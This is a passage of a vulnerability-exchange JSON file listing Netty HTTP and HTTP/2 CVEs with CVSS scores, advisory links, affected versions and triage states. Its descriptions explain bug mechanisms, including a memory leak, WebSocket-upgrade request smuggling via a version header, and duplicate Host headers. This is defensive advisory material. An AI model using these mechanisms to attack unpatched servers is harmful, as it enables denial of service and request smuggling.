          "url": "https://avd.aquasec.com/nvd/cve-2026-56746"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56746"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-6cqp-g7gg-8hr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56746"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56746"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:47:53+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#b1b42980-e87b-46fb-be86-f34ad6f9c7ee"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#cff319d9-d2ab-4007-9da2-703d1fc7dba4"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#fa671cee-ccf5-489e-a0dc-c5cb76f01208"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#a6670819-be8c-4e71-80d2-8c83f6a9e2f2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#79b6a2a2-1138-4f6c-86a6-7515a31a79e5"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#95def8fc-e2a0-4428-86a7-fc8b0f327481"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#3c01b3bd-7a53-46e9-a65d-82fc92230cda"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#61b8b13d-fc97-47e3-af68-ec382837e498"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#c5d116b9-00ed-45c5-bb98-c906f8511aa6"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#e4918e4b-9d4d-4e6a-ab05-bca0c81718aa"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#dc043094-2429-4640-aa08-314bb97fa93c"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ec30aa83-f779-4849-ac6d-82699cdb225e"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#e9603ec6-3fa6-4dbf-a005-d3ff97032634"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56819",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        401
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, a remote unauthenticated peer can leak one direct `ByteBuf` per HTTP/2 `DATA` frame in applications that enable HTTP/2 content decompression via `DelegatingDecompressorFrameListener`. When a `DATA` frame is processed for a stream whose decompressor has already been closed, `Http2Decompressor.decompress(...)` calls `decompressor.writeInbound(data.retain())` and does not release the retained buffer on the error path, eventually exhausting direct memory and crashing the JVM. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http2 to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56819"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56819"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003bhttps://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-93wv-jw9v-4972"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56819"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56819"
        }
      ],
      "published": "2026-07-21T23:17:52+00:00",
      "updated": "2026-07-30T14:46:35+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#cd4454f4-c858-47be-bc35-7f5075b4b30a"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#f6d97189-b8c9-45d6-a238-a601e1db6cb9"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#fda97a46-7093-4a32-a0e5-3b90984a8150"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#e629f446-1688-422b-8839-a7c13e4405b1"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#bf287c4e-f32d-4fd6-b7b9-a36141991c03"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#f8f87321-52d0-4a35-a7e2-5e336e32ba2c"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#98a9db66-7d09-461d-8096-a81c787dd770"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#a59bf860-58b0-49f0-bffa-b9ef23a90039"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#987ff9b0-2852-4e09-be3f-dd8ad55e3b42"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c5271fdb-2804-4d74-becc-b8bf22854657"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#4625c928-ea3c-4783-a039-a78bf4bcce65"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#df3167fd-2762-4db9-817a-714eedf67be7"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#e242e76c-2bd6-4b85-b4ee-900e5c1371be"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-59898",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        444
      ],
      "description": "Netty is an asynchronous, event-driven network application framework.  Prior to versions 4.1.136.Final and 4.2.16.Final, ab attacker can force WebSocket upgrade via the lax V07 (or V08) handshaker by sending `Sec-WebSocket-Version: 7` and omitting `Connection: Upgrade` / `Upgrade: websocket` headers, completing a protocol switch that a proxy would not recognize as an Upgrade request and enabling HTTP request smuggling / protocol-confusion attacks. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59898"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59898"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-4mp9-239f-g9hg"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59898"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59898"
        }
      ],
      "published": "2026-07-29T19:16:48+00:00",
      "updated": "2026-08-06T20:35:23+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#b1b42980-e87b-46fb-be86-f34ad6f9c7ee"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#cff319d9-d2ab-4007-9da2-703d1fc7dba4"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#fa671cee-ccf5-489e-a0dc-c5cb76f01208"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#a6670819-be8c-4e71-80d2-8c83f6a9e2f2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#79b6a2a2-1138-4f6c-86a6-7515a31a79e5"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#95def8fc-e2a0-4428-86a7-fc8b0f327481"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#3c01b3bd-7a53-46e9-a65d-82fc92230cda"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#61b8b13d-fc97-47e3-af68-ec382837e498"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#c5d116b9-00ed-45c5-bb98-c906f8511aa6"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#e4918e4b-9d4d-4e6a-ab05-bca0c81718aa"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#dc043094-2429-4640-aa08-314bb97fa93c"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ec30aa83-f779-4849-ac6d-82699cdb225e"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#e9603ec6-3fa6-4dbf-a005-d3ff97032634"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59899",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, `HttpContentEncoder` (the superclass of the production handler `HttpContentCompressor`) maintains a per-channel `ArrayDeque<CharSequence>` named `acceptEncodingQueue` that accumulates attacker-controlled data without any size limit. The queue is filled on the I/O thread for every inbound HTTP request and drained only when the application later writes a non-1xx response. This creates a resource exhaustion vulnerability when an attacker exploits HTTP/1.1 pipelining to flood the connection with requests faster than the application produces responses. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59899"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59899"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-q4f6-jm68-57ww"
        },
        {
          "url": "https://netty.io/news/2026/07/09/4-1-136-Final.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59899"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59899"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:25:31+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#b1b42980-e87b-46fb-be86-f34ad6f9c7ee"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#cff319d9-d2ab-4007-9da2-703d1fc7dba4"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#fa671cee-ccf5-489e-a0dc-c5cb76f01208"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#a6670819-be8c-4e71-80d2-8c83f6a9e2f2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#79b6a2a2-1138-4f6c-86a6-7515a31a79e5"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#95def8fc-e2a0-4428-86a7-fc8b0f327481"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#3c01b3bd-7a53-46e9-a65d-82fc92230cda"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#61b8b13d-fc97-47e3-af68-ec382837e498"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#c5d116b9-00ed-45c5-bb98-c906f8511aa6"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#e4918e4b-9d4d-4e6a-ab05-bca0c81718aa"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#dc043094-2429-4640-aa08-314bb97fa93c"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ec30aa83-f779-4849-ac6d-82699cdb225e"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#e9603ec6-3fa6-4dbf-a005-d3ff97032634"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59900",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        }
      ],
      "cwes": [
        444
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, Netty's HTTP/2-to-HTTP/1.x translation layer (`Http2StreamFrameToHttpObjectCodec` and `InboundHttp2ToHttpAdapter`) fails to deduplicate or validate `Host` headers when an HTTP/2 client supplies both the `:authority` pseudo-header and a literal `host` header in a single HEADERS frame. The translator maps `:authority` to `Host` and separately copies the literal `host` header, producing an `HttpRequest` object containing two `Host` headers with attacker-controlled differing values. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http2 to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59900"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59900"
        },
        {
          "url": "https://github.com/advisories/GHSA-c69g-56f8-xwqj"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-c69g-56f8-xwqj"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59900"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59900"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:29:01+00:00",
      "affects": [
        {
